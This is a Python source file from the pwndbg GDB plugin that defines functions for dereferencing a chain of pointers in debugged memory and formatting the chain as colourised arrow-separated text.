import pwndbg.color.chain as C
import pwndbg.color.memory as M
import pwndbg.color.theme as theme
import pwndbg.enhance
import pwndbg.memory
import pwndbg.symbol
import pwndbg.typeinfo
import pwndbg.vmmap
LIMIT = pwndbg.config.Parameter('dereference-limit', 5, 'max number of pointers to dereference in a chain')
def get(address, limit=LIMIT, offset=0, hard_stop=None, hard_end=0, include_start=True):
"""
Recursively dereferences an address. For bare metal, it will stop when the address is not in any of vmmap pages to avoid redundant dereference.
Arguments:
address(int): the first address to begin dereferencing
limit(int): number of valid pointers
offset(int): offset into the address to get the next pointer
hard_stop(int): address to stop at
hard_end: value to append when hard_stop is reached
include_start(bool): whether to include starting address or not
Returns:
A list representing pointers of each ```address``` and reference
"""
limit = int(limit)
result = [address] if include_start else []
for i in range(limit):
# Don't follow cycles, except to stop at the second occurrence.
if result.count(address) >= 2:
break
if hard_stop is not None and address == hard_stop:
result.append(hard_end)
break
try:
address = address + offset
# Avoid redundant dereferences in bare metal mode by checking
# if address is in any of vmmap pages
if not pwndbg.abi.linux and not pwndbg.vmmap.find(address):
break
address = int(pwndbg.memory.poi(pwndbg.typeinfo.ppvoid, address))
address &= pwndbg.arch.ptrmask
result.append(address)
except gdb.MemoryError:
break
return result
config_arrow_left = theme.Parameter('chain-arrow-left', '◂—', 'left arrow of chain formatting')
config_arrow_right = theme.Parameter('chain-arrow-right', '—▸', 'right arrow of chain formatting')
config_contiguous = theme.Parameter('chain-contiguous-marker', '...', 'contiguous marker of chain formatting')
def format(value, limit=LIMIT, code=True, offset=0, hard_stop=None, hard_end=0):
"""
Recursively dereferences an address into string representation, or convert the list representation
of address dereferences into string representation.
Arguments:
value(int|list): Either the starting address to be sent to get, or the result of get (a list)
limit(int): Number of valid pointers
code(bool): Hint that indicates the value may be an instruction
offset(int): Offset into the address to get the next pointer
hard_stop(int): Value to stop on
hard_end: Value to append when hard_stop is reached: null, value of hard stop, a string.
Returns:
A string representing pointers of each address and reference
Strings format: 0x0804a10 —▸ 0x08061000 ◂— 0x41414141
"""
limit = int(limit)
# Allow results from get function to be passed to format
if isinstance(value, list):
chain = value
else:
chain = get(value, limit, offset, hard_stop, hard_end)
arrow_left = C.arrow(' %s ' % config_arrow_left)
arrow_right = C.arrow(' %s ' % config_arrow_right)
# Colorize the chain
rest = []
for link in chain:
symbol = pwndbg.symbol.get(link) or None
if symbol:
symbol = '%#x (%s)' % (link, symbol)
rest.append(M.get(link, symbol))
# If the dereference limit is zero, skip any enhancements.
if limit == 0:
return rest[0]
# Otherwise replace last element with the enhanced information.
rest = rest[:-1]
# Enhance the last entry
# If there are no pointers (e.g. eax = 0x41414141), then enhance
# the only element there is.
if len(chain) == 1:
enhanced = pwndbg.enhance.enhance(chain[-1], code=code)
# Otherwise, the last element in the chain is the non-pointer value.
# We want to enhance the last pointer value. If an offset was used
# chain failed at that offset, so display that offset.
elif len(chain) < limit + 1:
enhanced = pwndbg.enhance.enhance(chain[-2] + offset, code=code)
else:
enhanced = C.contiguous('%s' % config_contiguous)
if len(chain) == 1:
return enhanced
return arrow_right.join(rest) + arrow_left + enhanced
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.